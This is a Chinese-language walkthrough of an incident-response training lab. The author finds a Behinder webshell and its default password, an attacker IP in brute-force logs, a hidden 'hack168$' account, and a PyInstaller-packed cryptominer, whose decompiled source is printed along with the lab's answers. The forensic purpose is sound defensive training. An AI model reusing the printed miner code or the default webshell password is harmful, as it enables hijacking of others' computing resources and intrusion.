知攻善防应急响应靶机训练-Web1

知攻善防应急响应靶机训练-Web1

本次应急响应靶机采用的是知攻善防实验室的Web-1应急响应靶机 靶机下载地址为: https://pan.quark.cn/s/4b6dffd0c51a

首先是将靶机导入虚拟机

如果直接导入 将会有版本不适配的弹窗 解决办法是在虚拟机文件中找到

image-20241023095721237

.vmx格式的文件 使用记事本打开 修改其中的版本为自己的vmware版本即可正常打开

image-20241023095958855

打开虚拟机

image-20241023100124939

发现有phpstudy 打开看看

image-20241023100312438
image-20241023103727456

在服务器上上传应急响应工具

使用d盾

image-20241023103944888

发现了image-20241023104242886

读取一下shell信息

image-20241023104624912

找到shell连接密码,并进行解密,发现为默认冰蝎密码rebeyond

回到PHP study中,找到Apache的日志文件

image-20241023104830624
image-20241023104816372

查看日志文件

image-20241023104922448

使用查找 发现有大量爆破行为 猜测存在弱口令image-20241023105109786

image-20241023105322141

攻击者ip为192.168.126.1

使用Windows日志一键分析功能

image-20241023105413944
image-20241023105514670

发现未知用户名hack168$image-20241023105539229

找到该用户文件夹位置,寻找蛛丝马迹

C:\Users\hack168$

image-20241023105631462

在桌面找到程序kuang.exe

image-20241023105752500
image-20241023105821279
image-20241023105833827

系统直接崩溃

判别为挖矿程序,进行分析 分析该文件

image-20241023110143623

该挖矿程序为pyinstaller打包,使用pyinstxtractor进行反编译

工具下载地址:GitHub - extremecoders-re/pyinstxtractor: PyInstaller Extractor

命令为:

python pyinstxtractor.py C:\Users\hack168$\Desktop\Kuang.exe

image-20241023110238548

得到pyc文件

image-20241023110301943

得到了kuang的pyc文件

使用在线pyc反编译工具

附上两个地址 1 https://www.lddgo.net/string/pyc-compile-decompile

​ 2 https://toolkk.com/tools/pyc-decomplie

得到源码

Visit https://www.lddgo.net/string/pyc-compile-decompile for more information # Version : Python 3.8 import multiprocessing import requests def cpu_intensive_task(): try: requests.get('http://wakuang.zhigongshanfang.top', 10, **('timeout',)) finally: continue continue continue if name == 'main': cpu_count = multiprocessing.cpu_count() processes = (lambda .0: [ multiprocessing.Process(cpu_intensive_task, **('target',)) for _ in .0 ])(range(cpu_count)) for process in processes: process.start() for process in processes: process.join()

得到了矿池域名http://wakuang.zhigongshanfang.top

解题答案

shell密码:rebeyond

攻击者ip地址 192.168.126.1

攻击者隐藏账户名称:hack168

矿池域名:wakuang.zhigongshanfang.top

image-20241023113021353
总结
第一次做应急响应的靶场 思路和渗透测试的时候恰恰相反 需要从各种方面去分析寻找答案